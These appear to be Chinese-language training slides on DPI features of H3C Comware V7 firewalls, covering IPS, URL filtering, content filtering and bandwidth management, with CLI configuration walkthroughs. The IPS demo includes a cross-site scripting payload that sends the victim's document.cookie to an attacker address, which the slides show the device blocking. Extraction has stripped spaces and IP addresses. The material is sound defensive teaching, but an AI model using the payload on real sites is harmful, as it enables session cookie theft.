深度報文檢測技術(shù)Comware V7 DPI

深度報文檢測技術(shù)ComwareV7DPI了解DPI特性基本原理掌握DPI特性配置方法熟悉DPI特性應(yīng)用場景了解DPI特性基本維護學(xué)習(xí)完本課程，您應(yīng)該能夠：21.DPI基本工作原理2.DPI功能及相應(yīng)配置方法3.DPI典型組網(wǎng)應(yīng)用4.DPI基本維護目錄3DPI深度安全的需求背景DPI（DeepPacketInspection，深度報文檢測）深度安全是一種基于應(yīng)用層信息對流經(jīng)設(shè)備的網(wǎng)絡(luò)流量進(jìn)行檢測和控制的安全機制業(yè)務(wù)識別：指對報文傳輸層以上的內(nèi)容進(jìn)行分析，由應(yīng)用層檢測引擎模塊來完成，是實現(xiàn)DPI深度安全功能的核心和基礎(chǔ)。業(yè)務(wù)識別的結(jié)果為DPI各業(yè)務(wù)模塊對報文的處理提供判斷依據(jù)業(yè)務(wù)控制：系統(tǒng)根據(jù)各DPI業(yè)務(wù)模塊策略及規(guī)則配置，實現(xiàn)對業(yè)務(wù)流量的靈活控制，包括：放行、丟棄、源阻斷、重置、捕獲和生成日志業(yè)務(wù)統(tǒng)計：指對業(yè)務(wù)流量的類型、協(xié)議解析結(jié)果、特征報文檢測和處理結(jié)果等進(jìn)行統(tǒng)計。統(tǒng)計結(jié)果可直觀體現(xiàn)業(yè)務(wù)流量分布和使用情況，為網(wǎng)絡(luò)可視化運維和業(yè)務(wù)持續(xù)優(yōu)化提供依據(jù)4DPI基本工作原理5預(yù)定義特征庫自定義特征配置規(guī)則V7域間策略原始數(shù)據(jù)流純凈數(shù)據(jù)流特征下發(fā)規(guī)則下發(fā)IPS特征庫APR特征庫URL分類特征庫自定義IPS規(guī)則自定義URL規(guī)則DPI簡易報文處理流程6DPI與V7域間策略的關(guān)系71.DPI基本工作原理2.DPI功能及相應(yīng)配置方法3.DPI典型組網(wǎng)應(yīng)用4.DPI基本維護8目錄DPI為ComwareV7提供的特性APR 應(yīng)用識別IPS 入侵防御UFLT URL過濾DFLT 內(nèi)容過濾AVC 帶寬管理AV 病毒防護9應(yīng)用識別APR基于端口的應(yīng)用層協(xié)議識別PBAR通用端口映射主機端口映射基于內(nèi)容特征的應(yīng)用層協(xié)議識別NBAR預(yù)定義特征庫自定義特征（TCP、UDP、HTTP）基于流特征的應(yīng)用識別10APR特征庫支持1000多種主流應(yīng)用特征支持在線服務(wù)器升級及周期自動升級支持本地離線升級支持特征庫回滾與恢復(fù)出廠狀態(tài)升級特征庫需License授權(quán)11應(yīng)用12IPS入侵防御系統(tǒng)深度防護：可以檢測報文應(yīng)用層內(nèi)容，以及對網(wǎng)絡(luò)數(shù)據(jù)流進(jìn)行協(xié)議分析和重組，并根據(jù)檢測結(jié)果來對報文做出相應(yīng)的處理實時防護：實時檢測流經(jīng)設(shè)備的網(wǎng)絡(luò)流量，并對入侵活動和攻擊網(wǎng)絡(luò)流量進(jìn)行實時攔截全方位防護：可以對多種攻擊類型提供防護措施，例如蠕蟲、病毒、木馬、僵尸網(wǎng)絡(luò)、間諜軟件、廣告軟件、跨站腳本攻擊、注入攻擊、目錄遍歷、信息泄露、遠(yuǎn)程文件保護攻擊、溢出攻擊、代碼執(zhí)行、拒絕服務(wù)、掃描攻擊、后門等等內(nèi)外兼防：對經(jīng)過設(shè)備的流量都可以進(jìn)行檢測，不僅可以防止來自企業(yè)外部的攻擊，還可以防止發(fā)自企業(yè)內(nèi)部的攻擊13IPS特征庫預(yù)定義特征支持2w+的特征周期發(fā)布、自動周期在線更新手工立即在線更新或離線更新特征庫回滾或恢復(fù)出廠設(shè)置升級需License授權(quán)自定義特征需遵循Snort語法僅支持以文件導(dǎo)入方式形成自定義IPS特征14IPS動作IPS動作指設(shè)備對匹配IPS特征的報文可執(zhí)行的操作，IPS處理動作包括如下幾種類型重置：通過發(fā)送TCP的reset報文或UDP的ICMP端口不可達(dá)報文斷開TCP或UDP連接源阻斷：阻斷符合特征的報文。如果設(shè)備上同時開啟了黑名單過濾功能，則將該報文的源IP地址加入黑名單，再次收到來自此IP地址的報文時直接丟棄丟棄：丟棄符合特征的報文放行：允許符合特征的報文通過捕獲：捕獲符合特征的報文生成日志：對符合特征的報文生成日志信息15IPS策略策略整體流程如果報文與黑名單匹配成功，則直接丟棄該報文如果報文匹配了某對象策略規(guī)則，且此對象策略規(guī)則的動作是inspect，則設(shè)備將對報文進(jìn)行深度內(nèi)容檢測：首先，識別報文的協(xié)議，然后根據(jù)協(xié)議分析方案進(jìn)行更精細(xì)的分析，并深入提取報文特征設(shè)備將提取的報文特征與IPS特征進(jìn)行匹配，并對匹配成功的報文進(jìn)行如下處理如果報文同時與多個IPS特征匹配成功，則根據(jù)這些動作中優(yōu)先級最高的動作進(jìn)行處理。動作優(yōu)先級從高到低的順序為：reset->(block-source/drop)->permit，其中block-source與drop的優(yōu)先級相同如果報文只與一個IPS特征匹配成功，則根據(jù)此特征中指定的動作進(jìn)行處理如果報文未與任何IPS特征匹配成功，則設(shè)備直接允許報文通過16IPS策略典型組網(wǎng)如圖所示，Device分別通過Trust安全域和Untrust安全域與局域網(wǎng)和Internet相連?，F(xiàn)要求使用設(shè)備上的缺省IPS策略對常見的網(wǎng)絡(luò)攻擊進(jìn)行防御17IPS策略典型配置配置各接口的IP地址（略）配置IPS功能創(chuàng)建名為sec的DPI應(yīng)用profile，并進(jìn)入該DPI應(yīng)用profile視圖[Device]app-profilesec在DPI應(yīng)用profilesec中應(yīng)用缺省IPS策略default，并指定該IPS策略的模式為Protect[Device-app-profile-sec]ipsapplypolicydefaultmodeprotect配置對象策略配置安全域向安全域Trust中添加接口GigabitEthernet1/0/1[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/1向安全域Untrust中添加接口GigabitEthernet1/0/2[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/218IPS策略典型配置（續(xù)）配置對象創(chuàng)建名為ipsfilter的IP地址對象組，并定義其子網(wǎng)地址為/24[Device]object-groupipaddressipsfilter[Device-obj-grp-ip-ipsfilter]networksubnet24配置對象策略及規(guī)則創(chuàng)建名為ipsfilter的IPv4對象策略，并進(jìn)入該對象策略視圖[Device]object-policyipipsfilter對源IP地址對象組ipsfilter對應(yīng)的報文進(jìn)行深度檢測，引用的DPI應(yīng)用profile為sec。[Device-object-policy-ip-ipsfilter]ruleinspectsecsource-ipipsfilterdestination-ipany配置安全域間實例并應(yīng)用對象策略創(chuàng)建源安全域Trust到目的安全域Untrust的安全域間實例，并應(yīng)用對源IP地址對象組ipsfilter對應(yīng)的報文進(jìn)行深度檢測的對象策略ipsfilter[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipipsfilter19IPS策略舉例20攻擊者HTTP服務(wù)器PC構(gòu)造CSS攻擊，訪問http服務(wù)器，通過瀏覽器訪問8:8080/?detail=<script>document.location.replace('0'+document.cookie);</script>檢測到攻擊阻斷并記錄日志威脅日志列表21威脅報表22UFLTURL過濾原理URL過濾功能是指對用戶訪問的URL進(jìn)行控制，即允許或禁止用戶訪問的Web資源，達(dá)到規(guī)范用戶上網(wǎng)行為的目的目前僅支持基于HTTP協(xié)議的URL過濾通過使用URL過濾規(guī)則匹配URL中的host字段和URI字段23URL過濾規(guī)則URL過濾規(guī)則是指對用戶HTTP報文中的URL進(jìn)行匹配的原則，且其分為兩種規(guī)則預(yù)定義規(guī)則：根據(jù)設(shè)備中的URL過濾特征庫自動生成，包括百萬級的HOST或URI。預(yù)定義規(guī)則能滿足多數(shù)情況下的URL過濾需求自定義規(guī)則：由管理員手動配置生成，可以通過使用正則表達(dá)式或者文本的方式來配置規(guī)則中HOST或URI的內(nèi)容URL過濾規(guī)則支持兩種匹配方式文本匹配：使用指定的字符串對HOST和URI字段進(jìn)行精確匹配正則表達(dá)式匹配：使用正則表達(dá)式對HOST和URI字段進(jìn)行模糊匹配。例如，規(guī)則中配置HOST的正則表達(dá)式為sina.*cn，則HOST為的URL會匹配成功24URL分類與URL策略為便于管理員對數(shù)目眾多的URL過濾規(guī)則進(jìn)行統(tǒng)一部署，URL過濾模塊提供了URL過濾分類功能，以便對具有相似特征的URL過濾規(guī)則進(jìn)行歸納以及為匹配這些規(guī)則的URL統(tǒng)一指定處理動作每個URL過濾分類具有一個嚴(yán)重級別屬性，即此過濾分類的處理優(yōu)先級預(yù)定義分類：根據(jù)設(shè)備中的URL過濾特征庫自動生成，僅可以修改其嚴(yán)重級別自定義分類：由管理員手動配置，可修改其嚴(yán)重級別，可添加URL過濾規(guī)則URL過濾策略是用于關(guān)聯(lián)所有URL過濾配置的一個實體策略中可以配置URL過濾分類和處理動作的綁定關(guān)系策略中可以配置缺省動作（即對未匹配上任何URL過濾規(guī)則的報文采取的動作）支持的處理動作包括，丟棄、放行、阻斷、重置和生成日志25URL過濾策略策略整體流程如果報文匹配了某對象策略規(guī)則，且此對象策略規(guī)則的動作是inspect，則設(shè)備提取報文中的URL字段進(jìn)行過濾規(guī)則匹配報文成功匹配URL過濾規(guī)則后，設(shè)備將進(jìn)一步判斷該規(guī)則是否同時屬于多個URL過濾分類如果此URL過濾規(guī)則同時屬于多個URL過濾分類，則根據(jù)嚴(yán)重級別最高的URL過濾分類的動作對此報文進(jìn)行處理如果此URL過濾規(guī)則只屬于一個URL過濾分類，則根據(jù)該規(guī)則所屬的URL過濾分類的動作對此報文進(jìn)行處理如果報文未匹配上任何一條URL過濾規(guī)則。設(shè)備將進(jìn)一步判斷URL過濾策略中是否存在URL過濾缺省動作，并根據(jù)缺省動作對此報文進(jìn)行處理否則直接允許報文通過26URL過濾策略典型組網(wǎng)如圖所示，Device分別通過Trust安全域和Untrust安全域與局域網(wǎng)和Internet相連。現(xiàn)有組網(wǎng)需求如下允許Trust安全域的主機訪問Untrust安全域的WebServer上的配置預(yù)定義URL過濾分類Pre-Games的動作為丟棄并生成日志配置URL過濾策略缺省動作為丟棄和生成日志27URL過濾策略典型配置配置各接口的IP地址（略）配置URL過濾功能創(chuàng)建名news的URL過濾分類并進(jìn)入相應(yīng)視圖，設(shè)置該分類的級別值為2000[Device]url-filtercategorynewsseverity2000在URL過濾分類news中添加一條規(guī)則，使用字符串對host字段進(jìn)行精確匹配[Device-url-filter-category-news]rule1hosttext創(chuàng)建名為urlnews的URL過濾策略，并進(jìn)入該URL過濾策略視圖[Device]url-filterpolicyurlnews在URL過濾策略urlnews中，配置URL過濾分類news綁定的動作為允許[Device-url-filter-policy-urlnews]categorynewsactionpermit在URL過濾策略urlnews中，配置預(yù)定義URL過濾分類Pre-Games綁定的動作為丟棄并生成日志[Device-url-filter-policy-urlnews]categoryPre-Gamesactiondroplogging28URL過濾策略典型配置（續(xù)）在URL過濾策略urlnews中，配置策略的缺省動作為丟棄和告警[Device-url-filter-policy-urlnews]default-actionactiondroplogging創(chuàng)建名為sec的DPI應(yīng)用profile，并進(jìn)入該DPI應(yīng)用profile視圖[Device]app-profilesec在DPI應(yīng)用profilesec中應(yīng)用URL過濾策略urlnews[Device-app-profile-sec]url-filterapplyurlnews執(zhí)行inspectactivate命令使得以上與URL過濾策略相關(guān)的配置生效[Device]inspectactivate配置安全域向安全域Trust中添加接口GigabitEthernet1/0/1[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/1向安全域Untrust中添加接口GigabitEthernet1/0/2[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/229URL過濾策略典型配置（續(xù)）配置對象創(chuàng)建名為urlfilter的IP地址對象組，并定義其子網(wǎng)地址為/24[Device]object-groupipaddressurlfilter[Device-obj-grp-ip-urlfilter]networksubnet24配置對象策略及規(guī)則創(chuàng)建名為urlfilter的IPv4對象策略，并進(jìn)入該對象策略視圖[Device]object-policyipurlfilter對源IP地址對象組urlfilter對應(yīng)的報文進(jìn)行深度檢測，引用的DPI應(yīng)用profile為sec[Device-object-policy-ip-urlfilter]ruleinspectsecsource-ipurlfilterdestination-ipany配置安全域間實例并應(yīng)用對象策略創(chuàng)建源安全域Trust到目的安全域Untrust的安全域間實例，并應(yīng)用對源IP地址對象組urlfilter對應(yīng)的報文進(jìn)行深度檢測的對象策略urlfilter[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipurlfilter30URL過濾策略舉例31攻擊PCPC訪問符合安全策略的網(wǎng)站檢測到非合規(guī)訪問阻斷并記錄日志URL日志列表32URL報表33DFLT內(nèi)容過濾內(nèi)容過濾是一種對通過設(shè)備的應(yīng)用層協(xié)議報文內(nèi)容進(jìn)行過濾的安全機制采用內(nèi)容過濾功能可以阻止內(nèi)部網(wǎng)絡(luò)用戶訪問非法網(wǎng)站，并阻止含有非法內(nèi)容的報文進(jìn)入內(nèi)部網(wǎng)絡(luò)目前該功能僅支持HTTP協(xié)議34HTTP協(xié)議內(nèi)容過濾功能原理Method過濾設(shè)備收到HTTP請求報文后，對其中的請求Method字段進(jìn)行過濾，阻止用戶某些請求行為URI（UniformResourceIdentifier，統(tǒng)一資源標(biāo)識符）過濾設(shè)備收到HTTP請求報文后，對請求URI中的內(nèi)容進(jìn)行過濾，阻止用戶訪問某些特定的網(wǎng)站或阻止URI中非法內(nèi)容；同時支持對URI字段的長度進(jìn)行過濾Header過濾服務(wù)器發(fā)往客戶端的HTTP響應(yīng)報文中的Header字段一般包含當(dāng)前網(wǎng)頁的類型（如文本、圖片等）、HTTP內(nèi)容長度、服務(wù)器基本信息（如服務(wù)器類型、響應(yīng)時間等）等信息，使用Header過濾可以阻止Header字段中含有特定信息的HTTP響應(yīng)報文通過設(shè)備；同時，也支持對HTTP請求報文中Header字段進(jìn)行過濾Body過濾使用Body過濾可以對服務(wù)器發(fā)往客戶端的HTTP報文中攜帶的最終可視內(nèi)容（即用戶在瀏覽器上看到的實際內(nèi)容）進(jìn)行過濾，阻止含有特定可視內(nèi)容的報文通過設(shè)備，以防止非法內(nèi)容在內(nèi)部網(wǎng)絡(luò)中傳播；同時，也支持對HTTP請求報文的Body字段進(jìn)行過濾狀態(tài)行過濾使用狀態(tài)行過濾可以阻止?fàn)顟B(tài)行字段中含有特定信息的HTTP響應(yīng)報文通過設(shè)備35內(nèi)容過濾策略典型組網(wǎng)如圖所示，Device分別通過Trust安全域和Untrust安全域與局域網(wǎng)和Internet相連?，F(xiàn)有以下組網(wǎng)需求阻止子頭域中含有“abc”關(guān)鍵字的HTTP請求報文通過阻止Method字段含有GET關(guān)鍵字的HTTP請求報文通過阻止URI字段含有“uri”關(guān)鍵字的HTTP請求報文通過阻止Body字段含有“abc.*abc”關(guān)鍵字的HTTP響應(yīng)報文通過對以上被阻止的報文生成日志信息36內(nèi)容過濾策略典型配置配置各接口的IP地址（略）配置正則表達(dá)式集創(chuàng)建正則表達(dá)式集regex0，并進(jìn)入正則表達(dá)式集視圖[Device]content-filteringregexregex0配置匹配關(guān)鍵字abc。[Device-cflt-regex-regex0]patterntextabc創(chuàng)建正則表達(dá)式集regex1，并進(jìn)入正則表達(dá)式集視圖[Device]content-filteringregexregex1配置匹配關(guān)鍵字uri。[Device-cflt-regex-regex1]patterntexturi創(chuàng)建正則表達(dá)式集regex2，并進(jìn)入正則表達(dá)式集視圖[Device]content-filteringregexregex2配置正則表達(dá)式abc.*abc[Device-cflt-regex-regex2]patternregexabc.*abc37內(nèi)容過濾策略典型配置（續(xù)）配置內(nèi)容過濾規(guī)則類創(chuàng)建HTTP協(xié)議類型的內(nèi)容過濾規(guī)則類class1，并進(jìn)入過濾規(guī)則類視圖[Device]content-filteringclassclass1httpmatch-any配置規(guī)則1，指定HTTP請求報文的Method字段包含GET[Device-cflt-class-class1]match1requestmethodget配置規(guī)則2，指定匹配HTTP請求報文頭中所有子頭域正則表達(dá)式集為regex0[Device-cflt-class-class1]match2requestheaderregexregex1配置規(guī)則3，指定匹配HTTP請求報文中URI內(nèi)容的正則表達(dá)式集為regex1[Device-cflt-class-class1]match3requesturiregexregex1配置規(guī)則4，指定匹配HTTP響應(yīng)報文中Body字段的正則表達(dá)式集為regex2[Device-cflt-class-class1]match4responsebodyregexregex238內(nèi)容過濾策略典型配置（續(xù)）配置內(nèi)容過濾策略創(chuàng)建內(nèi)容過濾策略policy1，匹配模式為match-all，并進(jìn)入內(nèi)容過濾策略視圖[Device]content-filteringpolicypolicy1match-all配置內(nèi)容過濾規(guī)則類class1和動作reset、logging的綁定關(guān)系[Device-cflt-policy-policy1]classclass1actionresetlogging配置DPI應(yīng)用profile創(chuàng)建名稱為profile1的DPI應(yīng)用profile，并進(jìn)入DPI應(yīng)用profile視圖[Device]app-profileprofile1在DPI應(yīng)用profile中引用內(nèi)容過濾策略policy1[Device-app-profile-profile1]content-filteringapplypolicypolicy1執(zhí)行inspectactivate命令使得以上與內(nèi)容過濾策略相關(guān)的配置生效[Device]inspectactivate39內(nèi)容過濾策略典型配置（續(xù)）配置安全域向安全域Trust中添加接口GigabitEthernet1/0/2[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/2向安全域Untrust中添加接口GigabitEthernet1/0/1[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/1配置對象策略創(chuàng)建名為inspect1的對象策略。[Device]object-policyipinspect1配置對象策略規(guī)則0引用DPI應(yīng)用profileprofile1[Device-object-policy-ip-inspect1]rule0inspectprofile1配置安全域間實例創(chuàng)建源域Trust到目的域Untrust的安全域間實例，并應(yīng)用對象策略inspect1[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipinspect140AVC帶寬管理帶寬管理是指對通過設(shè)備的流量實現(xiàn)基于源/目的安全域、源/目的IP地址、用戶、應(yīng)用等，進(jìn)行精細(xì)化的管理和控制理帶寬管理的典型應(yīng)用場景如下企業(yè)內(nèi)網(wǎng)用戶所需的帶寬遠(yuǎn)大于從運營商租用的出口帶寬，這時網(wǎng)絡(luò)出口就會存在帶寬瓶頸的問題網(wǎng)絡(luò)出口中P2P業(yè)務(wù)類型的數(shù)據(jù)流量消耗了絕大部分的帶寬資源，致使企業(yè)的關(guān)鍵業(yè)務(wù)得不到帶寬保證為了解決以上問題，可以在網(wǎng)絡(luò)出口設(shè)備上部署帶寬管理，針對不同的內(nèi)網(wǎng)業(yè)務(wù)流量應(yīng)用不同的帶寬策略規(guī)則，實現(xiàn)合理分配出口帶寬和保證關(guān)鍵業(yè)務(wù)正常運行的目的41帶寬管理功能原理流量匹配上帶寬策略中的某條規(guī)則后，設(shè)備將根據(jù)此規(guī)則中指定的動作來對該流量進(jìn)行控制。如果動作是限流（qosprofileprofile-name），則流量繼續(xù)進(jìn)入相應(yīng)的帶寬通道進(jìn)行后續(xù)的處理；如果動作是拒絕（deny），則拒絕此流量通過；如果規(guī)則中沒有配置動作，則直接允許該流量通過流量進(jìn)入帶寬通道后，設(shè)備會根據(jù)此帶寬通道中的配置，對流量進(jìn)行相應(yīng)的處理。目前帶寬通道中可配置保證最小帶寬和限制最大帶寬42帶寬策略與規(guī)則帶寬策略中可以配置多個帶寬策略規(guī)則，這些規(guī)則用于定義匹配流量的匹配項以及流量控制的動作不同規(guī)則之間的匹配順序為：按規(guī)則配置的先后順序?qū)α髁窟M(jìn)行匹配，一旦流量匹配某條規(guī)則便結(jié)束全部匹配過程，并根據(jù)該規(guī)則中指定的動作對此流量進(jìn)行處理如果流量沒有匹配任何規(guī)則，則允許該流量通過一個帶寬策略規(guī)則中可以配置多種類型的匹配項匹配項包括：源/目的安全域、源/目的IP地址、用戶/用戶組、應(yīng)用/應(yīng)用組、時間段每類匹配項支持配置多個條件43帶寬策略與規(guī)則（續(xù)）判斷流量是否被帶寬策略規(guī)則匹配的方式有兩種只有規(guī)則中配置的所有匹配項均被匹配，才認(rèn)為匹配成功只要規(guī)則中配置的任意一個匹配項被匹配，即認(rèn)為匹配成功帶寬策略規(guī)則支持嵌套關(guān)系，即一個規(guī)則中可以指定一個父規(guī)則。流量進(jìn)行匹配時，遵守如下原則首先匹配父規(guī)則，若父規(guī)則匹配失敗，不再進(jìn)行關(guān)聯(lián)子規(guī)則匹配父規(guī)則匹配成功后，再進(jìn)行關(guān)聯(lián)子規(guī)則匹配若子規(guī)則匹配成功，則執(zhí)行子規(guī)則中指定的動作若子規(guī)則匹配失敗，則仍執(zhí)行父規(guī)則中指定的動作44帶寬通道帶寬通道定義了具體的帶寬資源，是執(zhí)行帶寬管理的基礎(chǔ)可將物理的帶寬資源從邏輯上劃分為多個虛擬的帶寬通道，每個帶寬通道中均可自定義相應(yīng)的帶寬資源限制參數(shù)目前支持的帶寬資源限制參數(shù)包括以下兩類保證帶寬：是指保證業(yè)務(wù)的最小帶寬，在線路擁堵時，可以保證公司關(guān)鍵業(yè)務(wù)所需的帶寬，確保此類業(yè)務(wù)不受影響最大帶寬：是指限制業(yè)務(wù)的最大帶寬，比如限制網(wǎng)絡(luò)中非關(guān)鍵業(yè)務(wù)占用的帶寬資源，避免該類業(yè)務(wù)消耗大量的帶寬，影響其他關(guān)鍵業(yè)務(wù)的正常運行45帶寬管理策略典型組網(wǎng)主機A和主機B通過Device與外網(wǎng)相連，通過在Device上配置基于應(yīng)用的帶寬管理功能，實現(xiàn)當(dāng)內(nèi)網(wǎng)流量的出口發(fā)生擁塞時優(yōu)先保證FTP業(yè)務(wù)的需求。具體要求如下限制內(nèi)網(wǎng)用戶，訪問外網(wǎng)P2P應(yīng)用流量的上行最大帶寬和下行最大帶寬均為30720kbit/s。保證內(nèi)網(wǎng)用戶，訪問外網(wǎng)FTP應(yīng)用的流量的上行保證帶寬和下行保證帶寬均為30720kbit/s限制外網(wǎng)出接口的最大帶寬為30720kbit/s46帶寬管理策略典型配置配置各接口的IP地址（略）配置帶寬通道創(chuàng)建名為profileP2P的帶寬通道，并進(jìn)入該帶寬通道視圖。[Device]traffic-policy[Device-traffic-policy]profilenameprofileP2P配置上/下行最大帶寬均為30720kbit/s。[Device-traffic-policy-profile-profileP2P]bandwidthupstreammaximum30720[Device-traffic-policy-profile-profileP2P]bandwidthdownstreammaximum30720創(chuàng)建名為profileFTP的帶寬通道，并進(jìn)入該帶寬通道視圖。[Device-traffic-policy]profilenameprofileFTP配置上/下行保證帶寬均為30720kbit/s。[Device-traffic-policy-profile-profileFTP]bandwidthupstreamguaranteed30720[Device-traffic-policy-profile-profileFTP]bandwidthdownstreamguaranteed3072047帶寬管理策略典型配置（續(xù)）配置出接口的期望帶寬配置接口GigabitEthernet1/0/1的期望帶寬為30720kbit/s[Device]interfacegigabitethernet1/0/1[Device-GigabitEthernet1/0/1]bandwidth30720[Device-GigabitEthernet1/0/1]quit配置帶寬策略規(guī)則進(jìn)入帶寬策略視圖[Device]traffic-policy創(chuàng)建名為ruleP2P的帶寬策略規(guī)則，并進(jìn)入該帶寬策略規(guī)則視圖[Device-traffic-policy]rulenameruleP2P在帶寬策略規(guī)則ruleP2P中引用自定義的應(yīng)用P2P[Device-traffic-policy-rule-ruleP2P]applicationappp2p48帶寬管理策略典型配置（續(xù)）配置帶寬策略規(guī)則ruleP2P中的動作為限流并應(yīng)用帶寬通道profileP2P[Device-traffic-policy-rule-ruleP2P]actionqosprofileprofileP2P創(chuàng)建名為ruleFTP的帶寬策略規(guī)則，并進(jìn)入該帶寬策略規(guī)則視圖[Device-traffic-policy]rulenameruleFTP配置帶寬策略規(guī)則ruleFTP中引用預(yù)定義的應(yīng)用ftp[Device-traffic-policy-rule-ruleFTP]applicationappftp配置帶寬策略規(guī)則ruleFTP中的動作為限流并應(yīng)用帶寬通道profileFTP[Device-traffic-policy-rule-ruleFTP]actionqosprofileprofileFTP49DPI特性配置方法總則501.DPI基本工作原理2.DPI功能及相應(yīng)配置方法3.DPI典型組網(wǎng)應(yīng)用4.DPI基本維護51目錄DPI典型組網(wǎng)在各類數(shù)據(jù)中心/園區(qū)網(wǎng)，為實現(xiàn)對內(nèi)網(wǎng)用戶上網(wǎng)行為進(jìn)行監(jiān)控審計，并對一些占用帶寬比較嚴(yán)重的應(yīng)用進(jìn)行限速，可在出口處部署支持DPI特性的設(shè)備52F5020日志分析服務(wù)器某企業(yè)園區(qū)網(wǎng)聯(lián)動認(rèn)證日志收集豐富報表EIA/Radius/AAA認(rèn)證服務(wù)器1.DPI基本工作原理2.DPI功能及相應(yīng)配置方法3.DPI典型組網(wǎng)應(yīng)用4.DPI基本維護53目錄查看DPI檢測狀態(tài)54displayinspectstatus字段釋義Runningstatus應(yīng)用層檢測引擎的運行狀態(tài)，包括如下取值：bypassbyconfigure：因為配置原因引擎無法處理報文bypassbycpubusy：因為CPU使用率過高導(dǎo)致引擎無法處理報文bypassbymemoryshortage：因為內(nèi)存不足導(dǎo)致引擎無法處理報文normal：引擎工作正常應(yīng)用層檢測引擎規(guī)則命中統(tǒng)計信息Slot1:RuleID ModuleRulehitsAChitsPCREtryPCREhits1 IPS 030 0 03 IPS 01 1 0268435460 UFLT 295955295955 0 0273678345 UFLT 419419 0 0268435465 UFLT 419419 0 011 IPS 09 21 015 IPS 11 1 116 IPS 02 2 055displayinspecthit-statistics字段釋義RuleID檢測規(guī)則IDModule檢測規(guī)則所屬的DPI業(yè)務(wù)的名稱RuleHit檢測規(guī)則被命中次數(shù)ACHitAC關(guān)鍵字被命中的次數(shù)PCRETry正則表達(dá)式嘗試匹配的次數(shù)PCREHit正則表達(dá)式被命中的次數(shù)應(yīng)用層檢測引擎HTTP協(xié)議統(tǒng)計信息Slot1:NewCtxNewCtxErrDelCtxReqTsRspTsReqSecTsRspSecTsReqErrTsRspErrTs90 999100056displayinspecthttp字段釋義NewCtx申請資源的次數(shù)，應(yīng)用層檢測引擎為記錄HTTP報文解析結(jié)果，需要申請資源NewCtxErr申請資源失敗的次數(shù)，內(nèi)存不足會導(dǎo)致申請資源失敗DelCtx應(yīng)